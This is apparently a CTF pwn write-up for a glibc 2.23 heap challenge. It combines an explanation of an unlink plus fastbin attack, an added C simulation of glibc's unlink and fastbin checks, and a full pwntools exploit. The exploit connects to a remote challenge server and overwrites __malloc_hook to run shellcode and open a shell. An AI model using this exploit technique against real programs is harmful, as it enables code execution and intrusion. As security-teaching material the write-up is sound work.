The binary has add, edit and free but no show; PIE is off; .bss is writable and executable; there is a heap overflow on write (edit takes the length from the input, not from the chunk) and a UAF (free does not clear the pointer array). The exploit is unlink + fastbin attack. No address leak is needed, because only the low bytes of libc pointers that are already in the heap get modified.
Approach:
- First create chunks of 0x28, 0x80, 0x10 (plus two more 0x10). Use the overflow from chunk 0 to write a fake chunk into its data and clear chunk 1's PREV_INUSE; freeing chunk 1 then triggers unlink on the fake chunk, which leaves entry 0 of the pointer array pointing into the array itself (buf-0x18).
- Since free does not clear the entries and only 9 chunks may be created, once the array is controlled zero the stale entries but keep the entry that points into the array; also park the shellcode in .bss right behind the array.
- Allocate 0x10, 0x60, 0x10 out of the consolidated chunk now sitting in the unsorted bin. Free the 0x60 chunk (it lands in the 0x70 fastbin), use the overflow from the neighbouring chunk to change its size to 0x91, then free it again (UAF): as a 0x90 chunk it goes into the unsorted bin, leaving a pointer to main_arena+88 in the 0x60 chunk's fd.
- Restore the size to 0x71 and change the low byte of that fd to 0x05: the fastbin now points just before __malloc_hook, where the high bytes of the libc pointer stored in __realloc_hook (0x00007f...) read as a fake size field of 0x7f, which passes the fastbin size check for the 0x70 bin.
- Allocate 0x60 (0x68 in the exp, same 0x70 bin) twice; the second allocation returns the fake chunk, whose user data starts at __malloc_hook+5.
- Change the low byte of the pointer-array entry holding that chunk to 0x10 so it points exactly at __malloc_hook, then edit it to write the shellcode address into the hook.
- The next allocation calls __malloc_hook and drops a shell.
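The two glibc 2.23 checks the steps above have to satisfy, the unlink hardening and the fastbin size check, simulated in C as an added example (this is not code from the original writeup). Memory is a flat byte array with offsets as addresses; the constants PTRS, HEAP and HOOKS are assumptions standing in for the pointer array at 0x601040, the program's heap and the libc hook area before main_arena, and the hook values are constructed placeholders for libc text pointers.

```c
/* Added example: simulates the glibc 2.23 unlink and fastbin checks the exploit
 * passes. Flat memory, addresses are offsets. PTRS/HEAP/HOOKS are assumed
 * stand-ins for 0x601040, the heap and the libc hook area. Not the original exp. */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE 0x2000
#define PTRS     0x1040   /* stand-in for the .bss pointer array (buf = 0x601040) */
#define HEAP     0x0100   /* stand-in for chunk 0's header address */
#define HOOKS    0x1b00   /* stand-in for &__memalign_hook; __malloc_hook = HOOKS+0x10 */

static uint8_t mem[MEM_SIZE];

static uint64_t rd(uint64_t a)             { uint64_t v; memcpy(&v, mem + a, 8); return v; }
static void     wr(uint64_t a, uint64_t v) { memcpy(mem + a, &v, 8); }

/* 2.23 chunk accessors for 64-bit (SIZE_BITS = 0x7, SIZE_SZ = 8) */
static uint64_t chunksize(uint64_t p)      { return rd(p + 8) & ~(uint64_t)0x7; }
static uint64_t prev_size(uint64_t p)      { return rd(p); }
static uint64_t fd(uint64_t p)             { return rd(p + 0x10); }
static uint64_t bk(uint64_t p)             { return rd(p + 0x18); }
static int      fastbin_index(uint64_t sz) { return (int)((sz >> 4) - 2); }
static uint64_t request2size(uint64_t req) { return (req + 8 + 0xf) & ~(uint64_t)0xf; }

/* unlink() from 2.23 malloc.c without the large-bin branch.
 * 0 = success, -1 = "corrupted size vs. prev_size", -2 = "corrupted double-linked list" */
static int unlink_chunk(uint64_t p) {
    if (chunksize(p) != prev_size(p + chunksize(p))) return -1;
    uint64_t f = fd(p), b = bk(p);
    if (bk(f) != p || fd(b) != p) return -2;
    wr(f + 0x18, b);   /* FD->bk = BK: lands on buf[0] */
    wr(b + 0x10, f);   /* BK->fd = FD: also buf[0], this write wins -> buf[0] = buf-0x18 */
    return 0;
}

/* Chunk 0 (0x30) and chunk 1 (0x90) with the writeup's fake chunk written into
 * chunk 0's data: flat(0, 0x21, buf-0x18, buf-0x10, 0x20, 0x90). The last word
 * is the 8-byte overflow that rewrites chunk 1's size and clears PREV_INUSE.
 * ptr0 != 0 overrides buf[0], to show the double-linked-list check firing. */
static void unlink_setup(uint64_t ptr0) {
    memset(mem, 0, MEM_SIZE);
    uint64_t c0 = HEAP, c1 = HEAP + 0x30, fake = c0 + 0x10;
    wr(c0 + 8, 0x31);
    wr(c1 + 8, 0x91);
    wr(PTRS, ptr0 ? ptr0 : fake);   /* buf[0] = chunk 0 user data = the fake chunk */
    wr(fake + 0x00, 0);
    wr(fake + 0x08, 0x21);          /* fake size 0x20; the low bits are masked off */
    wr(fake + 0x10, PTRS - 0x18);   /* fd: fd->bk is buf[0] */
    wr(fake + 0x18, PTRS - 0x10);   /* bk: bk->fd is buf[0] */
    wr(fake + 0x20, 0x20);          /* chunk 1 prev_size == fake chunksize */
    wr(fake + 0x28, 0x90);          /* chunk 1 size with PREV_INUSE cleared */
}

/* Start of free(chunk 1): PREV_INUSE clear -> backward consolidation -> unlink(fake). */
static int free_chunk1(void) {
    uint64_t c1 = HEAP + 0x30;
    if (rd(c1 + 8) & 1) return 1;          /* previous chunk in use, nothing to unlink */
    return unlink_chunk(c1 - prev_size(c1));
}
static uint64_t ptr_array_entry(int idx) { return rd(PTRS + 8 * idx); }

/* Hook area as it sits before main_arena in the 2.23 libc: __memalign_hook and
 * __realloc_hook are still libc text pointers (0x00007f........), __malloc_hook
 * is NULL after the first malloc, main_arena starts at HOOKS+0x20, so the
 * main_arena+88 left in fd by the double free sits at HOOKS+0x78. */
static void hook_setup(void) {
    memset(mem, 0, MEM_SIZE);
    wr(HOOKS + 0x00, 0x00007f1234567890ULL);  /* __memalign_hook (constructed value) */
    wr(HOOKS + 0x08, 0x00007f1234567abcULL);  /* __realloc_hook  (constructed value) */
    wr(HOOKS + 0x10, 0);                      /* __malloc_hook */
}
static uint64_t main_arena_plus_88(void) { return HOOKS + 0x20 + 88; }

/* edit(1, ... + b'\x05'): only the low byte of the fastbin fd changes */
static uint64_t fake_fastbin(void) { return (main_arena_plus_88() & ~0xffULL) | 0x05; }

/* malloc's fastbin check: fastbin_index(chunksize(victim)) must equal the request's index */
static int fake_passes_fastbin_check(uint64_t req) {
    hook_setup();
    return fastbin_index(chunksize(fake_fastbin())) == fastbin_index(request2size(req));
}
/* The second 0x68 allocation returns fake+0x10; edit(0, ... + p8(0x10)) turns it into __malloc_hook */
static uint64_t hook_from_entry(void) { return ((fake_fastbin() + 0x10) & ~0xffULL) | 0x10; }

int main(void) {
    unlink_setup(0);
    int rc = free_chunk1();
    printf("unlink rc=%d, buf[0]=0x%llx (buf-0x18 = 0x%llx)\n", rc,
           (unsigned long long)ptr_array_entry(0), (unsigned long long)(PTRS - 0x18));
    hook_setup();
    printf("fake chunk size 0x%llx -> bin %d, request 0x68 -> bin %d, entry|0x10 == __malloc_hook: %d\n",
           (unsigned long long)chunksize(fake_fastbin()), fastbin_index(chunksize(fake_fastbin())),
           fastbin_index(request2size(0x68)), hook_from_entry() == HOOKS + 0x10);
    return 0;
}
```

The unlink part shows why fd and bk must be buf-0x18 and buf-0x10: both point back through buf[0], which already holds the fake chunk's address, so the 2.23 `fd->bk == P && bk->fd == P` check passes without any leak. The hook part shows why the low byte 0x05 is chosen: the size field read at that position is 0x7f, which masks to 0x78 and falls in the same fastbin index as the 0x70 chunk being requested.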
Full exploit:
from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('111.200.241.244', 57362)
libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]   # one_gadget offsets, unused: shellcode in .bss is used instead
libc_start_main_ret = 0x20830                # unused, kept from the template
elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'
menu = b"Your choice :"

def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Size: ", str(size).encode())
    p.sendafter(b"Data: ", msg)

def free(idx):
    # the entry in the pointer array is not cleared: UAF / double free
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"Index: ", str(idx).encode())

def edit(idx, msg):
    # the size is whatever we send, not the chunk size: heap overflow
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(len(msg)).encode())
    p.sendafter(b"Data: ", msg)

# Step 1: chunks of 0x30 / 0x90 / 0x20 / 0x20 / 0x20
add(0x28, b'A')   # idx 0
add(0x80, b'A')   # idx 1
add(0x10, b'A')   # idx 2
add(0x10, b'A')   # idx 3
add(0x10, b'A')   # idx 4

buf = 0x601040    # pointer array in .bss (no PIE)
# fake chunk in chunk 0's data: fd->bk and bk->fd both resolve to buf[0], which holds
# chunk 0's data address (the fake chunk itself), so the unlink check passes; the last
# two words overflow into chunk 1's prev_size/size and clear PREV_INUSE
edit(0, flat(0, 0x21, buf-0x18, buf-0x10, 0x20, 0x90))
free(1)           # backward consolidation unlinks the fake chunk: buf[0] = buf-0x18
# buf[0] now points into the array itself: make it point at buf+8, zero idx 1..9
# (free does not clear entries and the chunk count is limited), and park the
# shellcode at buf+0x50 (.bss is executable)
edit(0, p64(0)*3 + p64(buf+8) + p64(0)*9 + asm(shellcraft.sh()))

# Step 2: carve the 0xb0 unsorted chunk into 0x20 / 0x70 / 0x20 (idx 1, 2, 3)
add(0x10, b'1')
add(0x60, b'2')
add(0x10, b'3')
free(2)                                   # idx 2 -> fastbin 0x70
edit(1, b'A'*0x18 + p8(0x91))             # overflow from idx 1: size 0x71 -> 0x91
free(2)                                   # double free as a 0x90 chunk -> unsorted bin, fd = main_arena+88
# restore size 0x71 and bend the low byte of fd: main_arena+88 (...78) -> ...05, a fake
# chunk whose size field reads 0x7f from the pointer stored just before __malloc_hook
edit(1, b'A'*0x18 + p64(0x71) + b'\x05')
add(0x68, b'4')                           # idx 4: the real 0x70 chunk
add(0x68, b'A')                           # idx 5: the fake chunk, user data = __malloc_hook+5

# Step 3: via idx 0 (-> buf+8) zero idx 1..4 and set the low byte of idx 5 to 0x10,
# so idx 5 points exactly at __malloc_hook
edit(0, p64(0)*4 + p8(0x10))
edit(5, p64(buf+0x50))                    # __malloc_hook = shellcode
p.sendlineafter(menu, b'1')               # any malloc now jumps to the shellcode
p.sendlineafter(b"Size: ", b'1')
p.interactive()